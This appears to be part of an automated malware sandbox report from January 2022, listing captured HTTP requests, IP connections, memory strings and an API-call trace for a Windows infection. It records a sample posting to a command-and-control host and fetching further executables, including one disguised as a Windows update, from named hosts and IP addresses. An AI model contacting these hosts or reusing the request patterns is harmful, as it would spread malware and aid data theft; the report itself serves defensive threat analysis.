                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qochog.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drvwc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsgnkffj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylqihxvnug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvrhmio.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oeaexcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcifwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rffngorjcd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfwxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://takmxbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftcxosy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhlwowqbr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykguadbgli.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ircqiowi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnvpcgnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.3:49789 -> 185.7.214.171:8080
                      Source: WerFault.exe, 00000015.00000002.434956390.0000000004A44000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.425224721.0000000004A44000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.433530972.000001C13D300000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: B217.exe, 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, B217.exe, 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000006.00000003.306594986.0000019EF1E67000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307389782.0000019EF1E6A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000006.00000002.307383226.0000019EF1E65000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.306713287.0000019EF1E45000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307316944.0000019EF1E3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000018.00000003.402970388.000001C13D36A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402911904.000001C13D3BE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402839287.000001C13D38D000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.402813003.000001C13D37D000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000018.00000003.404140344.000001C13D37E000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404329534.000001C13D3A0000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404235759.000001C13D819000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404260188.000001C13D802000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.404168368.000001C13D38F000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 10 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 